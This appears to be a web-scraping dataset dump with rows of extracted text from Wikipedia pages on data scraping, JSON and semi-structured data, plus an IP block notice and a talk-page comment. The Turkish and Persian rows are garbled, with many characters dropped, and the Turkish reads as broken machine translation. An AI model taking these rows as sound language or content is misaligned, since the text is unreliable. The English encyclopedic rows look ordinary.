distribution rather than a power law; they reported that 80% of the music tracks available sold no copies at all over a one-year period. Anderson responded by stating that the study's findings are difficult to assess without access to its data. 40 41 |
572 | https://en.wikipedia.org/wiki/Data_scraping | https://tr.wikipedia.org/wiki/Veri_kaz%C4%B1ma | Veri kaz ma bir bilgisayar program , ba ka bir programdan gelen insanlar taraf ndan okunabilir olan k veri ay klayan bir tekniktir. Normalde, programlar aras nda veri transferi bilgisayarlar de il, insanlar taraf ndan otomatik i lenmesi i in uygun veri yap lar n kullan larak ger ekle tirilir. B yle bir kav ak bi imleri ve protokolleri genellikle rijit kolayca z mlenir, iyi belgelenmi , yap land r lm ve en az belirsizlik devam edilmektedir . o u zaman, bu yay nlar t m insan taraf ndan okunabilir de il. 1 B ylece, d zenli ayr t rma gelen kaz ma verileri ay ran unsur kaz narak olan k yerine ba ka bir programa girdi olarak daha bir son kullan c ya ekranda y nelik oldu u ve bu nedenle genellikle belgelenmi ne uygun ayr t rma yap land r lm ne oldu unu. Veriler genellikle ikili veri (genellikle g r nt veya multimedya veri ), g r nt bi imlendirme, gereksiz etiketler, gereksiz yorum veya ilgisiz ya da otomatik i leme engelleyen di er bilgileri g rmezden i erir kaz ma . Veri kaz ma en s k mevcut donan m ile uyumlu olan ba ka hi bir mekanizmaya sahip bir eski sistem ya arabirime yap l r ya da daha uygun bir API sa lamaz bir nc taraf sisteme aray z . kinci durumda, nc taraf sistemi operat r genellikle ekran nedeniyle b yle y ksek sistem y k , reklam gelir kayb veya bilgi i eri inin kontrol kayb gibi nedenlerle, istenmeyen kaz ma g r rs n z . Veri kaz ma genellikle genellikle sadece veri de i imi i in ba ka bir mekanizma mevcut bir son are olarak kullan lan bir ad hoc, inelegant tekni i, kabul edilir . Kenara y ksek programlama ve i leme y k gelen, insani t ketim ama l k g r nt ler s k s k s k yap s n de i tirmek . nsanlar kolayca ba a kabilir, ancak sa ma bildirebilir bir bilgisayar program , belirli bir formatta veri okumak veya belirli bir yerden ve ge erlili i i in onun sonu lar n nas l denetlenece i hi bir bilgi ile s ylendi oyland . Ekran kaz ma normalde yerine Web kaz ma gibi verileri ayr t rma, bir kaynaktan gelen g rsel verilerin programatik koleksiyonu ile ili kilidir. Ba lang ta, ekran bilgisayar ekran terminalin ekrandan metin veri okuma uygulamas na at fta kaz ma . Bu i lem genellikle, yard mc ba lant noktas zerinden veya ba ka bir giri noktas na, bir bilgisayar sisteminin, terminal k ba lant noktas n terminalin okuma haf zas ile yap lm t r. Terimi ekran kaz ma de yayg n veri iki y nl de i imi ifade etmek i in kullan l r . Kontrol program kullan c aray z gezinirken ya da kontrol program anlam na bir arabirim veri giriyor daha karma k senaryolar insan taraf ndan kullan lmak zere burada basit vakalar olabilir. Bilgisayar veri i leme afak - klasik bir ekran kaz y c somut bir rnek olarak, 1960'lar n varsay msal eski sistem kalma d n n. O d nemin kullan c arabirimleri Bilgisayar, genellikle sanal tele yaz c lar ok daha fazla de ildi, sadece metin tabanl aptal terminalleri idi (bu sistemler e itli nedenlerle, hala kullan mda bug n). Daha modern sistemlere b yle bir sistem aray z arzusu yayg nd r. Bir sa lam bir z m genellikle kaynak kodu, sistem dok mantasyonu, API'ler ya da 50 ya ndaki bir bilgisayar sistemi deneyimi olan programc lar olarak art k eyler, gerektirecektir. Bu gibi durumlarda, tek z md r bir terminalde bir kullan c olmak "mi gibi" ekran kaz y c yazmak olabilir. Ekran kaz y c , istenen veri ay klamak, eski kullan c aray z gezinmek i in gerekli tu vuru lar n , s re ortaya kan g r nt k taklit, Telnet zerinden eski sisteme ba lanmak ve modern bir sisteme ge mek olabilir. rne in de i im kontrol , g venlik, kullan c y netimi, veri koruma, operasyonel denetim, y k dengeleme ve kuyruk y netimi, vb - - y neti im ve b y k bir kurulu taraf ndan gerekli kontrol sa layan bir platform zerine in a edilen bu tip (A sofistike ve esnek uygulama, olabilir Robotik s re otomasyonu yaz l m n n bir rne i oldu u s ylenebilir.) 1980'lerde, Reuters, Telerate ve Quotron finansal veri sa lay c lar , bir insan okuyucu y nelik 24 80 bi iminde veri g r nt lenir . Bu veriler, zellikle yat r m bankalar , kullan c lar yakalamak ve verileri tekrar anahtarlama olmadan ticaret kararlar i in hesaplamalar i ine dahil edilmesi i in say sal veri olarak bu karakter verileri d n t rmek i in uygulama yazd . Sonu lar ka t par alay c ge tik hayal olabilir nk zellikle ngiltere'de bu uygulama i in ortak terim, sayfa par alama oldu. ten Reuters VAX VMS zerinde geli mi bir bilgisayar sistemi al t ran, bu d n m s reci i in logicized terimini kullan lan Logicize denilenr. 2 Daha modern ekran kaz ma teknikleri ekrandan bitmap verilerini yakalama ve bir OCR motoru ile al an ya da baz zel otomatik test sistemleri i in, beklenen sonu lara kar ekran n bitmap verilerini e le en i erir . Bu programl altta yatan programlama nesnelerine ba vurular alarak grafik kontrolleri sorgulama ile GUI uygulamalar durumunda kombine edilebilir . Web kaz ma Web sayfalar , metin tabanl mark-up dilleri ( HTML ve XHTML ) kullan larak in a ve s k s k metin bi iminde yararl veri zenginli i i erirler . Ancak, o u web sayfalar , insan son kullan c lar i in de il, otomatik kullan m kolayl i in tasarlanm t r. Bu nedenle, web i eri i kaz mak ara kitleri olu turulmu tur. Bir web kaz y c bir web sitesine veri ay klamak i in bir API . Amazon AWS ve Google gibi irketler, son kullan c lara cretsiz olarak mevcut ara lar , hizmet ve kamu veri kaz ma web sa lar. Web kaz ma yeni formlar veri web sunucular ndan beslemeleri dinleme i erir . rne in, JSON yayg n istemci ve web sunucusu aras nda bir ta ma depolama mekanizmas olarak kullan l r. Son zamanlarda, irketler otomatik olarak yararl bilgiler elde etmek i in bir web sayfas n g r nt lerken olu ur insan i leme sim lasyonu i in DOM ayr t rma, bilgisayar g rme ve do al dil i leme teknikleri kullanarak g veniyor web kaz ma sistemleri geli tirdik. 3 4 Rapor madencilik insan okunabilir bilgisayar raporlar veri karma oldu unu. Geleneksel veri ekme bir al ma kayna sistemi, uygun ba lant standartlar veya bir API ve genellikle karma k sorgulama ba lant s gerektirir. Kaynak sisteminin standart raporlama se enekleri kullanarak, bir biriktirme dosyas yerine bir yaz c ya kt y nlendirerek, statik raporlar rapor madencilik yoluyla evrimd analiz i in uygun olu turulabilir. Bu yakla m, i saatlerinde yo un CPU kullan m n nlemek ERP m terileri i in son kullan c lisans maliyetlerini en aza indirebilirsiniz ve ok h zl prototip ve zel raporlar n geli tirilmesi sunabilir. Veri kaz ma ve web dinamik k ile etkile im i eren kaz ma Oysa, rapor madencilik gibi HTML, PDF veya metin olarak, bir insan okunabilir formatta dosyalardan veri ay klanmas i erir. Bunlar kolayca bir yaz c ya veri besleme durdurarak hemen her sistemden elde edilebilir. Bu yakla m, kaynak sistemine bir API programlamak gerek kalmadan veriyi elde etmek h zl ve basit bir yol sa layabilir. |
573 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Special:UrlShortener&url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FData_scraping | The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Main Page. |
574 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-9 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
575 | https://en.wikipedia.org/wiki/Data_scraping | https://pl.wikipedia.org/wiki/Screen_scraping | Screen scraping (dos . 'zeskrobywanie z ekranu') to technika, za pomoc kt rej program komputerowy wydobywa dane z wyj cia innego programu. S u cy do tego program to tak zwany screen scraper. G wnym elementem odr niaj cym screen scraping od parsingu jest to, e wyj cie programu poddawane scrapingowi przeznaczone jest dla cz owieka, a nie do interpretacji przez maszyn . Istnieje wiele synonim w screen scrapingu: data scraping, data extraction, web scraping, page scraping, oraz HTML scraping (przy czym ostatnie trzy odnosz si do stron WWW). Zazwyczaj transfer danych mi dzy programami odbywa si za po rednictwem struktur danych przystosowanych do maszyn, a nie ludzi. Struktury takie s najcz ciej dobrze uporz dkowane, atwe do odczytu i ograniczaj dwuznaczno oraz duplikacj do minimum. Bardzo cz sto s one nieczytelne dla cz owieka. Wyj cie przeznaczone dla cz owieka jest przeciwie stwem powy szego, formatowanie, nadmiarowe etykiety, komentarze, oraz inne informacje s nie tylko zb dne maszynie, ale mog tak e utrudni interpretacj danych. Jednak e je li wyj cie jest dost pne jedynie w takim przyjaznym cz owiekowi formacie, screen scraping staje si jedynym zautomatyzowanym sposobem przeprowadzenia transferu danych. Pierwotnie termin ten odnosi si do czytania danych z pami ci ekranu terminala komputerowego. Analogicznie screen scraping oznacza tak e skomputeryzowane przetwarzanie HTML-a na stronach WWW. W ka dym przypadku screen scraper musi by zaprogramowany nie tylko do przetwarzania interesuj cych danych, lecz tak e do odrzucania niechcianych informacji i formatowania. Screen scraping jest uznawany za nieeleganck technik , u ywan tylko jako ostateczno , kiedy aden inny mechanizm nie jest dost pny. Opr cz tego, e w programowanie trzeba w o y wi kszy wysi ek, dane przeznaczone dla cz owieka cz sto zmieniaj struktur . Ludzie radz sobie z tym bez problemu, programy komputerowe jednak w takich przypadkach przestaj dzia a lub (co gorsze) zwracaj niepoprawne wyniki. |
576 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/JSON | JSON (JavaScript Object Notation, pronounced d e s n or d e s n ) is an open standard file format and data interchange format that uses human-readable text to store and transmit data objects consisting of attribute value pairs and arrays (or other serializable values). It is a commonly used data format with diverse uses in electronic data interchange, including that of web applications with servers. JSON is a language-independent data format. It was derived from JavaScript, but many modern programming languages include code to generate and parse JSON-format data. JSON filenames use the extension .json. Douglas Crockford originally specified the JSON format in the early 2000s. 1 He and Chip Morningstar sent the first JSON message in April 2001. The 2017 international standard (ECMA 404 and ISO IEC 21778:2017) specifies that "JSON" is "pronounced d e .s n , as in 'Jason and The Argonauts' . 2 3 The first (2013) edition of ECMA 404 did not address the pronunciation. 4 The UNIX and Linux System Administration Handbook states, "Douglas Crockford, who named and promoted the JSON format, says it's pronounced like the name Jason. But somehow, 'JAY-sawn' a seems to have become more common in the technical community. 5 Crockford said in 2011, "There's a lot of argument about how you pronounce that, but I strictly don't care. 1 After RFC 4627 had been available as its "informational" specification since 2006, JSON was first standardized in 2013, as ECMA 404. 4 RFC 8259, published in 2017, is the current version of the Internet Standard STD 90, and it remains consistent with ECMA 404. 6 That same year, JSON was also standardized as ISO IEC 21778:2017. 2 The ECMA and ISO IEC standards describe only the allowed syntax, whereas the RFC covers some security and interoperability considerations. 7 JSON grew out of a need for a real-time server-to-browser session communication protocol without using browser plugins such as Flash or Java applets, the dominant methods used in the early 2000s. 8 Crockford first specified and popularized the JSON format. 1 The acronym originated at State Software, a company cofounded by Crockford and others in March 2001. The cofounders agreed to build a system that used standard browser capabilities and provided an abstraction layer for Web developers to create stateful Web applications that had a persistent duplex connection to a Web server by holding two Hypertext Transfer Protocol (HTTP) connections open and recycling them before standard browser time-outs if no further data were exchanged. The cofounders had a round-table discussion and voted on whether to call the data format JSML (JavaScript Markup Language) or JSON (JavaScript Object Notation), as well as under what license type to make it available. The JSON.org 9 website was launched in 2001. In December 2005, Yahoo began offering some of its Web services in JSON. 10 A precursor to the JSON libraries was used in a children's digital asset trading game project named Cartoon Orbit at Communities.com citation needed (the State cofounders had all worked at this company previously) for Cartoon Network citation needed , which used a browser side plug-in with a proprietary messaging format to manipulate DHTML elements (this system is also owned by 3DO citation needed ). Upon discovery of early Ajax capabilities, digiGroups, Noosh, and others used frames to pass information into the user browsers' visual field without refreshing a Web application's visual context, realizing real-time rich Web applications using only the standard HTTP, HTML, and JavaScript capabilities of Netscape 4.0.5 and Internet Explorer 5 . Crockford then found that JavaScript could be used as an object-based messaging format for such a system. The system was sold to Sun Microsystems, Amazon.com, and EDS. JSON was based on a subset of the JavaScript scripting language (specifically, Standard ECMA 262 3rd Edition—December 1999 11 ) and is commonly used with JavaScript, but it is a language-independent data format. Code for parsing and generating JSON data is readily available in many programming languages. JSON's website lists JSON libraries by language. In October 2013, Ecma International published the first edition of its JSON standard ECMA 404. 4 That same year, RFC 7158 used ECMA 404 as a reference. In 2014, RFC 7159 became the main reference for JSON's Internet uses, superseding RFC 4627 and RFC 7158 (but preserving ECMA 262 and ECMA 404 as main references). In November 2017, ISO IEC JTC 1 SC 22 published ISO IEC 21778:2017 2 as an international standard. On December 13, 2017, the Internet Engineering Task Force obsoleted RFC 7159 when it published RFC 8259, which is the current version of the Internet Standard STD 90. 12 13 Crockford added a clause to the JSON license stating, "The Software shall be used for Good, not Evil", in order to open-source the JSON libraries while mocking corporate lawyers and those who are overly pedantic. On the other hand, this clause led to license compatibility problems of the JSON license with other open-source licenses since open-source software and free software usually imply no restrictions on the purpose of use. 14 The following example shows a possible JSON representation describing a person. Although Crockford originally asserted that JSON is a strict subset of JavaScript and ECMAScript, 15 his specification actually allows valid JSON documents that are not valid JavaScript; JSON allows the Unicode line terminators U 2028 LINE SEPARATOR and U 2029 PARAGRAPH SEPARATOR to appear unescaped in quoted strings, while ECMAScript 2018 and older do not. 16 17 This is a consequence of JSON disallowing only "control characters". For maximum portability, these characters should be backslash-escaped. JSON exchange in an open ecosystem must be encoded in UTF 8. 6 The encoding supports the full Unicode character set, including those characters outside the Basic Multilingual Plane (U 0000 to U FFFF). However, if escaped, those characters must be written using UTF 16 surrogate pairs. For example, to include the Emoji character U 1F610 NEUTRAL FACE in JSON: JSON became a strict subset of ECMAScript as of the language's 2019 revision. 17 18 JSON's basic data types are: Whitespace is allowed and ignored around or between syntactic elements (values and punctuation, but not within a string value). Four specific characters are considered whitespace for this purpose: space, horizontal tab, line feed, and carriage return. In particular, the byte order mark must not be generated by a conforming implementation (though it may be accepted when parsing JSON). JSON does not provide syntax for comments. 21 Early versions of JSON (such as specified by RFC 4627) required that a valid JSON text must consist of only an object or an array type, which could contain other types within them. This restriction was dropped in RFC 7158, where a JSON text was redefined as any serialized value. Numbers in JSON are agnostic with regard to their representation within programming languages. While this allows for numbers of arbitrary precision to be serialized, it may lead to portability issues. For example, since no differentiation is made between integer and floating-point values, some implementations may treat 42, 42.0, and 4.2E 1 as the same number, while others may not. The JSON standard makes no requirements regarding implementation details such as overflow, underflow, loss of precision, rounding, or signed zeros, but it does recommend expecting no more than IEEE 754 binary64 precision for "good interoperability". There is no inherent precision loss in serializing a machine-level binary representation of a floating-point number (like binary64) into a human-readable decimal representation (like numbers in JSON) and back since there exist published algorithms to do this exactly and optimally. 22 Comments were intentionally excluded from JSON. In 2012, Douglas Crockford described his design decision thus: "I removed comments from JSON because I saw people were using them to hold parsing directives, a practice which would have destroyed interoperability. 21 JSON disallows "trailing commas", a comma after the last value inside a data structure. 23 Trailing commas are a common feature of JSON derivatives to improve ease of use. 24 RFC 8259 describes certain aspects of JSON syntax that, while legal per the specifications, can cause interoperability problems. In 2015, the IETF published RFC 7493, describing the "I-JSON Message Format", a restricted profile of JSON that constrains the syntax and processing of JSON to avoid, as much as possible, these interoperability issues. While JSON provides a syntactic framework for data interchange, unambiguous data interchange also requires agreement between producer and consumer on the semantics of specific use of the JSON syntax. 25 One example of where such an agreement is necessary is the serialization of data types that are not part of the JSON standard, for example, dates and regular expressions. The official MIME type for JSON text is application json, 26 and most modern implementations have adopted this. Legacy MIME types include text json, text x-json, and text javascript. 27 JSON Schema specifies a JSON-based format to define the structure of JSON data for validation, documentation, and interaction control. It provides a contract for the JSON data required by a given application and how that data can be modified. 28 JSON Schema is based on the concepts from XML Schema (XSD) but is JSON-based. As in XSD, the same serialization deserialization tools can be used both for the schema and data, and it is self-describing. It is specified in an Internet Draft at the IETF, with the latest version as of 2024 being "Draft 2020 12". 29 There are several validators available for different programming languages, 30 each with varying levels of conformance. The standard filename extension is .json. 31 The JSON standard does not support object references, but an IETF draft standard for JSON-based object references exists. 32 JSON-RPC is a remote procedure call (RPC) protocol built on JSON, as a replacement for XML-RPC or SOAP. It is a simple protocol that defines only a handful of data types and commands. JSON-RPC lets a system send notifications (information to the server that does not require a response) and multiple calls to the server that can be answered out of order. Asynchronous JavaScript and JSON (or AJAJ) refers to the same dynamic web page methodology as Ajax, but instead of XML, JSON is the data format. AJAJ is a web development technique that provides for the ability of a web page to request new data after it has loaded into the web browser. Typically, it renders new data from the server in response to user actions on that web page. For example, what the user types into a search box, client-side code then sends to the server, which immediately responds with a drop-down list of matching database items. JSON has seen ad hoc usage as a configuration language. However, it does not support comments. In 2012, Douglas Crockford, JSON creator, had this to say about comments in JSON when used as a configuration language: "I know that the lack of comments makes some people sad, but it shouldn't. Suppose you are using JSON to keep configuration files, which you would like to annotate. Go ahead and insert all the comments you like. Then pipe it through JSMin 33 before handing it to your JSON parser. 21 MongoDB uses JSON-like data for its document-oriented database. Some relational databases, such as PostgreSQL and MySQL, have added support for native JSON data types. This allows developers to store JSON data directly in a relational database without having to convert it to another data format. JSON being a subset of JavaScript can lead to the misconception that it is safe to pass JSON texts to the JavaScript eval() function. This is not safe, due to certain valid JSON texts, specifically those containing U 2028 LINE SEPARATOR or U 2029 PARAGRAPH SEPARATOR, not being valid JavaScript code until JavaScript specifications were updated in 2019, and so older engines may not support it. 34 To avoid the many pitfalls caused by executing arbitrary code from the Internet, a new function, JSON.parse(), was first added to the fifth edition of ECMAScript, 35 which as of 2017 is supported by all major browsers. For non-supported browsers, an API-compatible JavaScript library is provided by Douglas Crockford. 36 In addition, the TC39 proposal "Subsume JSON" made ECMAScript a strict JSON superset as of the language's 2019 revision. 17 18 Various JSON parser implementations have suffered from denial-of-service attack and mass assignment vulnerability. 37 38 JSON is promoted as a low-overhead alternative to XML as both of these formats have widespread support for creation, reading, and decoding in the real-world situations where they are commonly used. 39 Apart from XML, examples could include CSV and supersets of JSON. Google Protocol Buffers can fill this role, although it is not a data interchange language. CBOR has a superset of the JSON data types, but it is not text-based. XML has been used to describe structured data and to serialize objects. Various XML-based protocols exist to represent the same kind of data structures as JSON for the same kind of data interchange purposes. Data can be encoded in XML in several ways. The most expansive form using tag pairs results in a much larger (in character count) representation than JSON, but if data is stored in attributes and 'short tag' form where the closing tag is replaced with , the representation is often about the same size as JSON or just a little larger. However, an XML attribute can only have a single value and each attribute can appear at most once on each element. XML separates "data" from "metadata" (via the use of elements and attributes), while JSON does not have such a concept. Another key difference is the addressing of values. JSON has objects with a simple "key" to "value" mapping, whereas in XML addressing happens on "nodes", which all receive a unique ID via the XML processor. Additionally, the XML standard defines a common attribute xml:id, that can be used by the user, to set an ID explicitly. XML tag names cannot contain any of the characters () , ; ? , nor a space character, and cannot begin with , ., or a numeric digit, whereas JSON keys can (even if quotation mark and backslash must be escaped). 40 XML values are strings of characters, with no built-in type safety. XML has the concept of schema, that permits strong typing, user-defined types, predefined tags, and formal structure, allowing for formal validation of an XML stream. JSON has several types built-in and has a similar schema concept in JSON Schema. XML supports comments, while JSON does not. 41 21 Support for comments and other features have been deemed useful, which has led to several nonstandard JSON supersets being created. Among them are HJSON, 42 HOCON, and JSON5 (which despite its name, is not the fifth version of JSON). 43 44 YAML version 1.2 is a superset of JSON; prior versions were not strictly compatible. For example, escaping a slash with a backslash is valid in JSON, but was not valid in YAML. 45 YAML supports comments, while JSON does not. 45 43 21 CSON ("CoffeeScript Object Notation") uses significant indentation, unquoted keys, and assumes an outer object declaration. It was used for configuring GitHub's Atom text editor. 46 47 48 There is also an unrelated project called CSON ("Cursive Script Object Notation") that is more syntactically similar to JSON. 49 HOCON ("Human-Optimized Config Object Notation") is a format for human-readable data, and a superset of JSON. 50 The uses of HOCON are: JSON5 ("JSON5 Data Interchange Format") is an extension of JSON syntax that just like JSON is also valid JavaScript syntax. The specification was started in 2012 and finished in 2018 with version 1.0.0. 61 The main differences to JSON syntax are: JSON5 syntax is supported in some software as an extension of JSON syntax, for instance in SQLite. 62 JSONC (JSON with Comments) is a subset of JSON5 used in Microsoft's Visual Studio Code: 63 Several serialization formats have been built on or from the JSON specification. Examples include |
577 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Template_talk:Information_security | I've been trying to figure out how to merge the different computer security articles Mobile security, Computer security, Cyber security and countermeasure, Network security, Internet security, World Wide Web security, Information security, Cyberwarfare, etc. and thought a great way to start would be to alert everyone of the existence of a wide range of unsynched and duplicate content, using this template. I welcome comments and additions - I know my list is incomplete.Timtempleton (talk) 22:15, 24 April 2014 (UTC) reply Information security is the broader parent topic. Moved template to title, Information security . Sagecandor (talk) 06:04, 21 December 2016 (UTC) reply |
578 | https://en.wikipedia.org/wiki/Data_scraping | https://fa.wikipedia.org/wiki/%D8%AA%D8%B1%D8%A7%D8%B4%E2%80%8C%D8%AF%D8%A7%D8%AF%D9%86_%D8%AF%D8%A7%D8%AF%D9%87 | ( : Data scraping) ( : human-readable) . ( ) . . . . . . ( IBM 3270) . (HTML XHTML) . . . ( ) . . . JSON . DOM . IP IP . . . (API) . ( ) . HTML, PDF . . API . |
579 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Semi-structured_data | Semi-structured data 1 is a form of structured data that does not obey the tabular structure of data models associated with relational databases or other forms of data tables, but nonetheless contains tags or other markers to separate semantic elements and enforce hierarchies of records and fields within the data. Therefore, it is also known as self-describing structure. In semi-structured data, the entities belonging to the same class may have different attributes even though they are grouped together, and the attributes' order is not important. Semi-structured data are increasingly occurring since the advent of the Internet where full-text documents and databases are not the only forms of data anymore, and different applications need a medium for exchanging information. In object-oriented databases, one often finds semi-structured data. XML, 2 other markup languages, email, and EDI are all forms of semi-structured data. OEM (Object Exchange Model) 3 was created prior to XML as a means of self-describing a data structure. XML has been popularized by web services that are developed utilizing SOAP principles. Some types of data described here as "semi-structured", especially XML, suffer from the impression that they are incapable of structural rigor at the same functional level as Relational Tables and Rows. Indeed, the view of XML as inherently semi-structured (previously, it was referred to as "unstructured") has handicapped its use for a widening range of data-centric applications. Even documents, normally thought of as the epitome of semi-structure, can be designed with virtually the same rigor as database schema, enforced by the XML schema and processed by both commercial and custom software programs without reducing their usability by human readers. In view of this fact, XML might be referred to as having "flexible structure" capable of human-centric flow and hierarchy as well as highly rigorous element structure and data typing. The concept of XML as "human-readable", however, can only be taken so far. Some implementations dialects of XML, such as the XML representation of the contents of a Microsoft Word document, as implemented in Office 2007 and later versions, utilize dozens or even hundreds of different kinds of tags that reflect a particular problem domain - in Word's case, formatting at the character and paragraph and document level, definitions of styles, inclusion of citations, etc. - which are nested within each other in complex ways. Understanding even a portion of such an XML document by reading it, let alone catching errors in its structure, is impossible without a very deep prior understanding of the specific XML implementation, along with assistance by software that understands the XML schema that has been employed. Such text is not "human-understandable" any more than a book written in Swahili (which uses the Latin alphabet) would be to an American or Western European who does not know a word of that language: the tags are symbols that are meaningless to a person unfamiliar with the domain. JSON or JavaScript Object Notation, is an open standard format that uses human-readable text to transmit data objects. JSON has been popularized by web services developed utilizing REST principles. Databases such as MongoDB and Couchbase store data natively in JSON format, leveraging the pros of semi-structured data architecture. The semi-structured model is a database model where there is no separation between the data and the schema, and the amount of structure used depends on the purpose. The advantages of this model are the following: The primary trade-off being made in using a semi-structured database model is that queries cannot be made as efficiently as in a more constrained structure, such as in the relational model. Typically the records in a semi-structured database are stored with unique IDs that are referenced with pointers to their location on disk. This makes navigational or path-based queries quite efficient, but for doing searches over many records (as is typical in SQL), it is not as efficient because it has to seek around the disk following pointers. The Object Exchange Model (OEM) is one standard to express semi-structured data, another way is XML. |
